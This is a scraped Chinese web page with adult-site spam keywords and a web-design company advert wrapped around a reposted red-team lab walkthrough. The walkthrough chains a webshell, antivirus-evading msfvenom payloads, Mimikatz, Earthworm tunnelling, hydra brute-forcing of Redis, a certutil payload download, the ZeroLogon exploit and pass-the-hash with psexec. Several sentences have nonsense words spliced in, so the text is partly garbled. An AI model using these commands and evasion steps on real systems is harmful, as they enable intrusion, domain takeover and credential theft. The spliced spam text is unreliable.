最近2018中文字幕在日韩欧美国产成人片_国产日韩精品一区二区在线_在线观看成年美女黄网色视频_国产精品一区三区五区_国产精彩刺激乱对白_看黄色黄大色黄片免费_人人超碰自拍cao_国产高清av在线_亚洲精品电影av_日韩美女尤物视频网站

RELATEED CONSULTING
相關(guān)咨詢
選擇下列產(chǎn)品馬上在線溝通
服務(wù)時(shí)間:8:30-17:00
你可能遇到了下面的問(wèn)題
關(guān)閉右側(cè)工具欄

新聞中心

這里有您想知道的互聯(lián)網(wǎng)營(yíng)銷解決方案
服務(wù)器攻防安全技巧 服務(wù)器攻防要學(xué)什么

安全攻防實(shí)戰(zhàn)系列MSF

前言

創(chuàng)新互聯(lián)網(wǎng)站建設(shè)服務(wù)商,為中小企業(yè)提供做網(wǎng)站、網(wǎng)站制作服務(wù),網(wǎng)站設(shè)計(jì),網(wǎng)站托管維護(hù)等一站式綜合服務(wù)型公司,專業(yè)打造企業(yè)形象網(wǎng)站,讓您在眾多競(jìng)爭(zhēng)對(duì)手中脫穎而出創(chuàng)新互聯(lián)。

在紅隊(duì)攻防中,我們主要在外網(wǎng)進(jìn)行信息收集,通過(guò)cms或者其他春饑漏洞拿到shell,之后通過(guò)免殺木馬將windows或linux服務(wù)器上線到cobalt strike或msf等c2服務(wù)器,之后對(duì)內(nèi)網(wǎng)進(jìn)行信息收集并繪制網(wǎng)絡(luò)拓?fù)鋱D,進(jìn)行工作組或域滲透,拿到各個(gè)網(wǎng)段機(jī)器的權(quán)限,遠(yuǎn)程登陸并截圖證明。

環(huán)境配置

從虛擬機(jī)網(wǎng)絡(luò)來(lái)看

機(jī)器描述

目錄如下

蟻劍拿shell

msf免殺拿shell

使用msfvenom生成免殺木馬payload,里面的IP和端口自行修改,就是反彈shell的kali

使用分離免殺工具生成loader.exe文件

對(duì)生成的exe文件進(jìn)行加殼免殺

免殺效果如下

免殺之后通過(guò)蟻劍上傳到server-bt上

msf開(kāi)啟監(jiān)聽(tīng)

蟻劍運(yùn)行

getuid

ps

msf內(nèi)網(wǎng)滲透

load mimikatz # 加載Mimikatz模塊

成功開(kāi)啟了遠(yuǎn)程桌面,并且生成了一個(gè)txt文件,這個(gè)txt文件往后可用中森胡來(lái)關(guān)閉遠(yuǎn)程桌面,關(guān)閉命令

run multi_console_command -r /root/.msf4/loot/xx_default_192.168.1.5_host.windows.cle_xxx5.txt

繞過(guò)火絨添加用戶

螞蟻劍或者cs上傳添加用戶.exe

遠(yuǎn)程登錄server-bt

然后再添加一個(gè)由system權(quán)限下開(kāi)啟的桌面進(jìn)程

Earthworm穿透

上傳EW(Earthworm)到C:/wwwroot/

kali環(huán)境進(jìn)行爆破

proxychains hydra -P /usr/xxx/password.lst 192.168.59.4 redis 6379

利用過(guò)程

代理蟻劍進(jìn)賣攔行連接這個(gè)shell

并查看權(quán)限

Earthworm穿透

掛代理,通過(guò)之前上傳的EW(Earthworm)

服務(wù)器端執(zhí)行以下命令(關(guān)掉server-bt的防火墻代理才能生效)

execute C:\wwwroot\ew.exe -s ssocksd -l 1090

用msfvenom生成一個(gè)正向馬傳進(jìn)去(因?yàn)闊o(wú)法訪問(wèn)外網(wǎng),反向出不來(lái)),msf正向連接。

使用分離免殺工具生成loader.exe文件

免殺效果如下

C:\ProgramData\xxxx.exe -i -c "certutil -urlcache -split -f msf1.exe

成功獲取服務(wù)器的shell,之后就是各種權(quán)限維持了。創(chuàng)建計(jì)劃任務(wù)、開(kāi)機(jī)自啟等等都能夠?qū)崿F(xiàn)。

ps

添加賬戶和遠(yuǎn)程連接同第一層

load mimikatz # 加載Mimikatz模塊

這里已經(jīng)滿足觸發(fā)zerologon的兩個(gè)條件,能ping通域控制器,知道域控計(jì)算機(jī)名,當(dāng)然最后dump出域內(nèi)所有hash的時(shí)候需要域名

置空域控機(jī)器用戶NTLM hash

proxychains python3 cve-2020-1472-exploit.py 12server-dc$ 10.10.10.201

接下來(lái)用置空的機(jī)器賬戶dump所有hash

(890c這個(gè)hash就是"空"的NTML hash)

我們的目標(biāo)是獲得域內(nèi)administrator的hash,然后就可以hash傳遞,登陸任意域內(nèi)機(jī)器

利用 psexec(PTH)上線server-dc到 MSF:

成功獲取到shell

利用 psexec 上線server-ex13到 MSF:


網(wǎng)站欄目:服務(wù)器攻防安全技巧 服務(wù)器攻防要學(xué)什么
URL標(biāo)題:http://fisionsoft.com.cn/article/dspgihe.html